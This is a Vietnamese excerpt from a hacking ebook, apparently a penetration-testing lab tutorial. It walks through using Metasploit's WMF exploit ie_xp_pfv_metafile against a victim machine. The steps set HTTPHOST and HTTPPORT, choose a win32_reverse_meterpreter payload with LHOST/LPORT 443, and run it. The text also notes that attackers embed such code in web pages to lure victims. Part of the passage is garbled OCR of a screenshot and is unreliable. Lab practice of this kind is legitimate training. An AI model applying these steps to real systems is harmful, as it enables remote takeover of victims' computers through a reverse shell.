Tham khảo tài liệu 'hacker professional ebook part 198', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | 3. Dùng IP Angry Scan để kiểm tra lại mô hình LAB gồm 2 máy Attacker Machine và Victim Machin 4. Kiểm tra đã có exploit code của lỗi bảo mật WMF hay chưa với lệnh show exploit từ cữa sổ MSF console sau đó chọn exploit code này ie_xp_pfv_metafile biết 1 exploit code cần phải có những option nào các bạn có thể chạy show options sau khi đã chọn exploit code ìoiT ÍỊụílủ-ht Hĩniiaưn Z4W1 HTTPHOST HTTITORT íiyi ÍOI nJ rripiĩred HKKO The leưrtl HITT Uitiinr heit The Inert I HĨTr listener Liort ưrtt- FTPS PASS tWrflw ũẻr HFl-Lir. USER erf low UạbẠÃA PĨĨ- Server USt R OverFlaw Hicrosafl SSL PtT ri i M tn 1 Overt law iucniaft UĨ NS F1S1H-fH5 õãflã Ewec ụ t ien vs Fit Sarver S H3 HSB Overt Imr ZENworki i 1 ktoy Sirver llỉinaycnenc KrtnvCử s windows sei net iĩnỉ. fiz H jpE vsftỊì-Ceivrr nlid tsouwrk-. dtshtop rtyddt Ceck Overt low Như vậy với mã khai thác trên các bạn cần phải xác định HTTPPORT đã được chọn default là 8080 . Cần phải xác định thêm HTTPHOST là địa chỉ của attacker machine máy dùng để tiến hành penetrating và chạy MSF. Trong trường hợp này là . Hãy dùng lệnh set HTTPPORT và tiếp theo là chọn Payload đọan code sẽ được thực thi trên Victimmachine khi quá trình exploit thành công . Dùng lệng set PAYLOAD win32_reverse_meterpreter như hình đưới đây 6. Tiếp tục chạy show options để xác định các tham số cần thiết cho Payload được chọn ta thấy có 2 tham số còn thiếu cần xác định là LHOST và LPORT 443 OK. Như vậy là đã đủ các tham số cần thiết cho quá trình exploit chúng ta cần lưu ý đây là quá trình exploit lỗi bảomật này là gián tiếp vì vậy các attacker sẽ nhúng code khai thác vào trang web và dụ victim truy cập vào những trang web này ở đây chúng ta tiến hành Hack My Self nên sẽ truy cập trực tiếp và Server có nhúng mã exploit là trong phần 2 chúng ta sẽ bàn đến quá trình nhúng code . Các bạn hãy chậy lệnh exploit Ở đây tôi dùng Dameware Remote Control một chương .